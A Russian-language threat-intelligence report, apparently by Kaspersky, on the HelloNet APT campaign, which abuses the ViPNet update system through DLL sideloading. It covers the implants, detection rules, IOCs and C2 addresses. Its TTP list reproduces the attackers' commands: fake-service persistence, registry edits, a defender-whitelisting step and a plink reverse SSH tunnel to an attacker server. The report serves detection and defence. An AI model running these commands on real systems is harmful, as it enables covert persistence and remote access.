Threat Response
Threat Response

Кампания HelloNet — новые вредоносные модули, которые запускаются через систему обновления ViPNet

Продукты и сервисы Kaspersky по теме

UPD 16.07.2026: Добавили правила для защиты компаний, использующих нашу SIEM-систему Kaspersky Unified Monitoring and Analysis Platform (KUMA), а также перечислили события для разработки собственных правил детектирования или проведения Threat hunting.

UPD 16.07.2026: Опубликовали рекомендации по выявлению вредоносной активности с помощью Kaspersky Managed Detection and Response.

UPD 16.07.2026: Добавили правила и примеры детектирования с помощью KEDR Expert.

UPD 16.07.2026: Добавлено выявление вредоносной кампании в сетевом трафике с помощью Kaspersky Anti Targeted Attack (KATA) с модулем NDR.

UPD 16.07.2026: Дополнили список индикаторов компрометации, опубликовали большой список TTPs.

Мы обнаружили новую APT-атаку с использованием ранее неизвестного инструментария, которая началась как минимум в мае 2026 года и остается активной на момент публикации. Она примечательна тем, что используемые в ходе нее импланты запускались через систему обновления ViPNet (программный комплекс для создания защищенных сетей). В ходе нашего исследования мы выявили попытки целенаправленного заражения крупных российских организаций из государственного, энергетического, транспортного, образовательного и логистического секторов, а также промышленности. Это уже не первый случай, когда продвинутая группировка нацеливается на компьютеры, подключенные к сетям ViPNet. Например, в прошлом году мы обнаружили сложный бэкдор, мимикрирующий под обновления ViPNet.

Закрепление через систему обновления

В одной из проанализированных систем мы выявили вредоносный файл c именем wtsapi32.dll в директории C:\Program Files (x86)\InfoTeCS\VIPNet Update System, которая относится к системе обновления комплекса ViPNet. Помещая файл в эту директорию, злоумышленники реализуют технику DLL Sideloading — ей подвержен исполняемый файл системы обновлений ViPNet itcsrvup64.exe, который запускается при старте операционной системы. Таким образом, в ходе данной атаки злоумышленники пытались реализовать закрепление на системе через компонент обновления ПО ViPNet.

HelloInjector — загрузчик дополнительных вредоносных компонентов

Компонент wtsapi32.dll является загрузчиком, который мы назвали HelloInjector. Его основная цель — внедрить свой код в процесс svchost.exe и запустить вредоносную нагрузку. После запуска вредонос проверяет процесс, в контексте которого он был запущен. Если имя основного процесса не svchost.exe, загрузчик запускает перебор всех процессов, запущенных в операционной системе. Он ищет процесс, имя которого содержит строку svchost, а командная строка — строку netsvcs. Если такой процесс найден, загрузчик внедряет себя в целевой процесс с помощью функций NtWriteVirtualMemory и NtCreateThreadEx.

После повторного запуска в новом процессе загрузчик снова проверяет имя процесса на наличие строки svchost. Убедившись в успешной проверке, HelloInjector загружает и выполняет в памяти вредоносную нагрузку, которая хранится в его теле в открытом виде.

HelloProxy — инструмент для проксирования трафика и запуска новых вредоносных нагрузок

Вредоносная нагрузка, которую мы назвали HelloProxy, является одновременно скрытым прокси и загрузчиком следующих модулей, которые присылает командный сервер. Она работает за счет перехвата функций NtDeviceIoControlFile, closesocket и shutdown. Их перехват осуществляется с помощью Microsoft библиотеки Detours.
Обработчики функций closesocket и shutdown препятствуют преждевременному закрытию сокетов, которые используются для взаимодействия с С2. В свою очередь, обработчик функции NtDeviceIoControlFile содержит основную вредоносную логику. Его код реализует перехват двух IOCTL кодов:

  • AFD_RECV (0x12017)
  • AFD_GET_TDI_HANDLES (0x12037)

Эти коды используются во время работы с сокетами — их перехват позволяет вредоносу препятствовать защитным решениям, работающим в режиме пользователя для фильтрации сетевых подключений. Защитные решения «Лаборатории Касперского» детектируют подобную активность и предотвращают попытки заражения на всех этапах.

Обработчик AFD_GET_TDI_HANDLES отвечает за регистрацию сокета, а обработчик AFD_RECV инициирует обработку входящего трафика. Стоит отметить, что каждое поступившее сообщение, которое вызвало обработку AFD_RECV кода, логируется в файл C:\users\public\tesh4RPC.txt в формате threadid: pid=\r\n. После установки перехватчиков, вредонос начинает прослушивать порты 5003 и 5060 в ожидании первых команд от С2 сервера. Для того, чтобы отличить трафик командного сервера от остального трафика, имплант реализует процесс рукопожатия: отправляет два байта 0x0502 через сокет и ожидает получить сообщение, содержащее строку ASDFASFSAFASDF. После успешного завершения рукопожатия, продолжается обработка входящих команд.

В зависимости от поступившей команды, есть две ветви исполнения:

  • Работа в качестве прокси. Вредонос принимает строки в виде : после чего создает новые сокеты и начинает передавать трафик между ними.
  • Работа в качестве загрузчика. Вредонос принимает исполняемый файл от командного сервера, после чего загружает его в память собственного процесса и запускает в отдельном потоке.

В ходе исследования нам удалось обнаружить две вредоносные нагрузки, которые были внедрены в процесс svchost, вероятно в результате работы ранее описанного загрузчика:

  • Имплант, который мы назвали HelloExecutor, с помощью которого атакующие могут выполнять команды на зараженной системе;
  • Модуль для очистки файлов журналов ПО ViPNet, который мы назвали HelloCleaner. Он позволяет скрыть действия злоумышленников в системе.

Мы установили, что бэкдор HelloExecutor использовался для проведения разведки в сетях зараженных организаций. Исполнялись следующие шелл-команды:

В этих командах примечательно упоминание директории C:\Users\Public\Music. Мы установили, что на зараженных машинах злоумышленники использовали эту директорию при запуске SSH-туннеля из зараженной инфраструктуры к командному серверу атакующих (5.39.253[.]206). Злоумышленники запускали переименованный исполняемый файл легитимной утилиты PuTTy (клиента для различных протоколов удаленного доступа):

HelloBackdoor — бэкдор на языке Rust для манипуляций файловой системой

Помимо этого, на одной из зараженных систем был обнаружен бэкдор написанный на языке Rust, который мы назвали HelloBackdoor. Он принимает подключения на 443 порту, ожидая строки 47c6235b4d2611184 (вторая половина MD5-хэша строки hello\n) для активации бэкдора. Этот бэкдор далее принимает следующие команды:

!upload — загрузить файл на зараженную машину

!down — выгрузить файл с зараженной машины

!stop — остановить работу бэкдора. Для этого создается и исполняется BAT-файл со следующим содержимым:

Если текст команды не совпал с выше перечисленными, команда выполняется с помощью cmd.exe.

Атрибуция

В ходе анализа одного из образцов DLL-файла wtsapi32.dll мы нашли неиспользуемую строку

Она отсылает к новостному порталу sina.com, популярному в Китае.

Кроме того, анализируя строки в бэкдоре HelloBackdoor, мы установили, что при компиляции осуществлялась загрузка пакетов (крейтов) Rust с зеркала mirrors.ustc.edu.cn. Скорее всего, данные строки остались во вредоносных файлах непреднамеренно. Однако нельзя исключать и вероятность использования «ложных флагов», внедренных злоумышленниками для усложнения процесса атрибуции. В настоящее время мы с низкой долей уверенности связываем данную кампанию с деятельностью неизвестной китайскоязычной APT-группировки.

Рекомендации

Учитывая, что ПО ViPNet не первый раз используется продвинутыми злоумышленниками для проведения кибератак, мы рекомендуем уделить особое внимание защите рабочих станций с данным ПО. В частности, следует настроить мониторинг сетевого трафика на указанных в статье портах для своевременного обнаружения признаков компрометации.

Противодействие сложным целевым атакам требует комплексного подхода, объединяющего технологии защиты, работающие на различных этапах жизненного цикла кибератаки. Такая многоуровневая модель безопасности помогает не только обнаруживать, но и предотвращать инциденты подобного класса. Данный подход заложен в архитектуру решений линейки Kaspersky Symphony, предназначенных для защиты бизнеса от угроз уровня APT, включая атаки, подобные описанной в этой статье.

Решения «Лаборатории Касперского» обнаруживают эту угрозу с помощью следующих вердиктов:

  • Trojan.Win32.Agentb.ttoe,
  • Trojan.Win64.Convagent.gen,
  • Trojan.Win64.Agent.smgpqx
  • HEUR:Trojan.Win64.DllHijacking.gen

Детектирование решениями «Лаборатории Касперского»


Защитные решения «Лаборатории Касперского», такие как Kaspersky Endpoint Detection and Response Expert, успешно обнаруживают вредоносную активность в рамках описанных атак.

Один из практических способов детектирования — мониторинг переименованных бинарников PuTTY/Plink, а не по имени файла: даже если исполняемый файл называется frontpage.exe, его PE-заголовок, версия, строки и хэш совпадают с оригинальным Plink, что подтверждается событиями EDR. Кроме того, стоит обратить внимание на конкретную командную строку, с которой запущен процесс. Решение KEDR Expert детектирует эту активность с помощью правила using_plink_or_putty_for_port_forwarding.

Также важно отслеживать Process Injection в svchost.exe от процесса обновления ViPNet itcsrvup64.exe, поскольку легитимно этот компонент не должен внедрять код в системные процессы. Подобное поведение является характерным индикатором активности HelloInjector, использующего доверенный и подписанный процесс как маскировку вредоносной инъекции. Решение KEDR Expert детектирует эту активность с помощью правила vipnet_load_library_code_injection.


Еще один эффективный способ обнаружения вредоносной активности связанной с VinNet, — это мониторинг сетевого трафика. Решение Kaspersky Anti Targeted Attack (KATA) с модулем NDR обнаруживает данную активность с помощью IDS модуля и Suricata правила на активность бэкдора — HelloBackdoor.

Правило реализовано, опираясь на первый ожидаемый вредоносом пакет. Он принимает подключения по протоколу TCP на 443 порту, ожидая получения команды 47c6235b4d2611184 (часть MD5-хэша строки hello\n), которая активирует бэкдор.


Сервис Kaspersky Managed Detection and Response детектирует данную атаку с помощью мониторинга следующих действий:

  1. Отслеживание создания библиотеки wtsapi32.dll в директории C:\Program Files (x86)\InfoTeCS\VIPNet Update System.
  2. Отслеживание запуска необычных процессов (не типовых для VipNet, отсутствует подпись InfoTeCS) от процесса обновлений VipNet (Itcsrvup64.exe или Itcsrvup.exe).
  3. Создание файлов библиотек (.dll) в директории связаной с VipNet (по умолчанию это ViPNet Update System или VIPNET CLIENT) от процессов VipNet.
  4. Нетиповая активность (создание файлов\запуск процессов) от экземпляра процесса svchost.exe.
  5. Создание исполняемых файлов в директориях доступных для записи по умолчанию (%ProgramData%, %TEMP%, %SystemRoot%\Temp, C:\Users\Public\, music|pictures|videos|contacts|links|libraries).
  6. Отслеживание создания туннелей с помощью процессов ssh или plink (идентификация выполняется по оригинальному имени PE-файла, а не по имени исполняемого файла), детект строится на наличии в командной строке подстрок вида port:address:port и их вариаций.


Для защиты компаний, использующих нашу SIEM-систему Kaspersky Unified Monitoring and Analysis Platform (KUMA), в репозитории продукта доступны правила, которые помогают обнаружить подобную вредоносную активность.

Выполнение разведки пользователей и групп, сетевых подключений стандартными утилитами Windows детектируется следующими правилами:

  • R220_02_Сбор информации об учетных записях стандартными средствами Windows
  • R221_01_Сбор информации о группах с помощью инструментов Windows
  • R224_02_Сбор информации об удаленной системе стандартными средствами Windows
  • R224_14_Разведывательная активность на Windows
  • R226_02_Сбор информации о сетевых подключениях стандартными средствами Windows

Также для разработки собственных правил детектирования или проведения Threat hunting рекомендуем обратить внимание на следующие события:

  • Создание подозрительных файлов в директории обновлений ViPNet C:\Program Files (x86)\InfoTeCS\VIPNet Update System:
  • Закрепление при помощи техники DLL Sideloading с загрузкой библиотеки wtsapi32.dll в процессы обновлений ViPNet Itcsrvup64.exe или Itcsrvup.exe с невалидной подписью (Signed not true, SignatureStatus not valid) или подпись не содержит информацию о производителе InfoTeCS:
  • Запуск нестандратных процессов от процессов обновлений ViPNet Itcsrvup64.exe или Itcsrvup.exe:
  • Запуск процессов обновлений ViPNet Itcsrvup64.exe или Itcsrvup.exe с невалидной подписью (Signed not true, SignatureStatus not valid) или подпись не содержит информацию о производителе InfoTeCS:
  • Нетипичное выполнение разведки от процесса svchost.exe:
  • Создание туннелей с помощью переименованных процессов ssh или plink:

Для корректной работы правил обнаружения и Threat hunting необходимо убедиться, что события с Windows-систем поступают в KUMA в полном объеме, включая события со следующими идентификаторами: Sysmon 1, 7, 11, а также Security 4688, 4663.

Индикаторы компрометации

HelloBackdoor
16C211C96735F2FAE9361B89BD7A31BF
1BFE2B9493128574907A8279256A8BCC
f9eed2f0158dc98e7012fb809152209c

Дропперы от HelloBackdoor
6001829A128FE264B4403138700C11A8 — infotecs\vipnet client\puh.exe
EE4FF46DDD8489E81447962F927BC3F6 — infotecs\vipnet client\store.exe

Утилита для внесения исключений в Windows Defender
41c938b3cd7e55d4077e34976929b140

wtsapi32.dll
B103CD21280B4061F88B2BCC51394894
9F5606A0755BC633B9BD7DB6D179C09E
0CFDFFC56F0FA325D0C4D24780B46597

С2
5.39.253[.]206
176.32.34[.]135

Обнаруженные TTP: 

T1569.002 — System Services: Service Execution

  • "cmd" /c sc start UrBackupClientBackend

T1016 — System Network Configuration Discovery

  • "cmd" /c arp -a
  • "cmd" /c routeprint

T1049 — System Network Connections Discovery

  • "cmd" /c netstat -ano

T1018 — Remote System Discovery

  • "cmd" /c ping mail.ru -n 2

T1082 — System Information Discovery

  • "cmd" /c systeminfo

T1057 — Process Discovery

  • "cmd" /c tasklist

T1007 — System Service Discovery

  • "cmd" /c sc query UrBackupClientBackend

T1083 — File and Directory Discovery

  • "cmd" /c dir temp*.tmp
  • "cmd" /c dir $temp\*.tmp
  • "cmd" /c dir amgmt*
  • "cmd" /c dir $user\desktop\mRemoteNG-Portable-1.76.20.24669
  • "cmd" /c dir $public\libraries\
  • "cmd" /c dir d:\WindowsImageBackup

T1005 — Data from Local System

  • "cmd" /c type $temp\TS_E9E3.tmp
  • "cmd" /c type $temp\Acr6F3D.tmp

T1074.001 — Local Data Staging

  • "cmd" /c copy appdata\infotecs\*\APN000B.txt $public\libraries\

T1070.004 — Indicator Removal: File Deletion

  • "cmd" /c del $windir\amgmt.dll
  • "cmd" /c del $public\libraries\APN000B.txt

T1543.003 — Create or Modify System Process: Windows Service

  • sc stop AppMgmt
  • sc delete AppMgmt
  • sc create AppMgmt binpath= "system32\svchost.exe -k netsvcs" type= share start= auto displayname= "Application Management"
  • sc description AppMgmt "Processes installation, removal, and enumeration requests for software deployed through Group Policy. If the service is disabled, users will be unable to install, remove, or enumerate software deployed through Group Policy. If this service is disabled, any services that explicitly depend on it will fail to start."
  • sc failure AppMgmt reset= 0 actions= restart/0

T1112 — Modify Registry

  • reg add HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt\Parameters /v ServiceDll /t REG_EXPAND_SZ /d $system32\$selfname.dll
  • reg add HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt\Parameters /v ServiceMain /t REG_SZ /d ServiceMain

T1036 — Masquerading (служба, описание и DLL маскируются под легитимную «Application Management»)

  • "cmd" /c copy $windir\amgmt* $system32\

T1059.003 — исполнение вспомогательных скриптов

  • "cmd" /c $windir\amgmt.bat
  • "cmd" /c $windir\insru.cmd

T1105 — Ingress Tool Transfer

  • "cmd" /c $programfiles\7-zip\7z.exe x $windir\Irsoisas.zip -o"$windir

T1562.001 — Impair Defenses: Disable or Modify Tools

  • "cmd" /c \$windir\puh.exe add $windir\autoit3.exe white

T1059 / T1218 — Proxy-исполнение через AutoIt

  • "cmd" /c \$windir\autoit3.exe \$windir\data.dat

T1572 — Protocol Tunneling / T1090 — Proxy / T1021.004 — Remote Services: SSH

  • c:\users\[username]\libraries\pagent.exe -C -N -R 6443:[redacted] root@176.32.34.135 -P 48022 -pw [redacted]

Кампания HelloNet — новые вредоносные модули, которые запускаются через систему обновления ViPNet

Ваш e-mail не будет опубликован. Обязательные поля помечены *

Отчеты

ToddyCat — ваш скрытый почтовый ассистент. Часть 2

Разбираем Umbrij — новый инструмент APT-группы ToddyCat для компрометации корпоративной переписки в сервисе Gmail. Целью атак стал токен авторизации OAuth, при помощи которого злоумышленники получали доступ к сервисам Google.

Подпишитесь на еженедельную рассылку

Самая актуальная аналитика – в вашем почтовом ящике